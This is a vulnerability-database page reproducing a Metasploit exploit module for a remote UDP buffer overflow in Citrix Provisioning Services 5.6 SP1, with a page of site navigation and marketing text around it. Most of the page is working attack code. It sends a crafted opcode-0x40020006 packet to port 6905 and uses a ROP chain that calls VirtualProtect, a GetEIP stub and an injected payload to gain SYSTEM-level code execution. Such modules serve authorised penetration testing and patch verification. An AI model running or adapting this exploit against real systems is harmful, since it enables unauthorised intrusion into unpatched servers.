Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow

🗓️ 31 May 2012 20:45:55Reported by Anyway <[email protected]>, alino <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 12 Views

Citrix Provisioning Services 5.6 SP1 Buffer Overflow via 0x40020006 Opcod

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow',
      'Description'    => %q{
          This module exploits a remote buffer overflow in the Citrix Provisioning Services
        5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode
        0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution
        under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2
        and Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
          'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '75780'],
          ['BID', '49803'],
          ['URL', 'http://support.citrix.com/article/CTX130846'],
          ['ZDI', '12-010']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'BadChars' => "\x00",
          'EncoderOptions' => {'BufferRegister'=>'ECX'},
        },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [ 'Citrix Provisioning Services 5.6 SP1',
            {
              'Offset' => 1500,
              'Ret'    => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-11-04',  #CTX130846 creation date
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(6905)])
  end

  def exploit

    packet =  "\x06\x00\x02\x40" # DATA MSG
    packet << rand_text_alpha_upper(18)
    packet << "\x00\x00\x00\x00"
    packet << "\x00\x00\x00\x00" # Length
    packet << rand_text_alpha_upper(target['Offset'])
    packet << [target.ret].pack('V')

    rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe

    rop_gadgets =
    [
      0x0045b141, # POP EAX; RETN streamprocess.exe
      0x1009a1bc, # VirtualProtect()
      0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
      0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
      0x004ad0cf, # POP EBP; RETN streamprocess.exe
      0x00455d9d, # PUSH ESP; RETN streamprocess.exe
      0x00497f5a, # POP EAX; RETN streamprocess.exe
      0xfffff9d0, # dwSize
      0x00447669, # NEG EAX; RETN streamprocess.exe
      0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
      0x00426305, # POP ECX; RETN streamprocess.exe
      0x00671fb9, # lpflOldProtect
      0x004e41e6, # POP EDI; RETN streamprocess.exe
      0x0040f004, # RETN streamprocess.exe
      0x00495c05, # POP EAX; RETN streamprocess.exe
      0xffffffc0, # flNewProtect
      0x0042c79a, # NEG EAX; RETN streamprocess.exe
      0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
      0x0045c1fa, # POP EAX; RETN streamprocess.exe
      0x90909090, # NOP
      0x00435bbe, # PUSHAD; RETN streamprocess.exe
    ].pack("V*")

    packet[338, rop_nop.length] = rop_nop
    packet[490, rop_gadgets.length] = rop_gadgets
    # Put payload address in ecx
    geteip = "\xeb\x03" # jmp short 0x5
    geteip << "\x59" # pop ecx
    geteip << "\xff\xd1" # call ecx
    geteip << "\xe8\xf8\xff\xff\xff" # call to "pop / call"
    packet[574, 10] = geteip
    packet[584, payload.encoded.length] = payload.encoded

    print_status("Trying target #{target.name}...")

    connect_udp
    udp_sock.put(packet)

    handler
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
0.6Low risk
Vulners AI Score0.6
citrix provisioning servicesbuffer overflow0x40020006code executionwindows server 2003 sp2windows xp sp3vulnerability discoveryremote buffer overflowmetasploit moduleudp portsystem contextosvdbbidzdiprivileged2011-11-04 disclosure date
12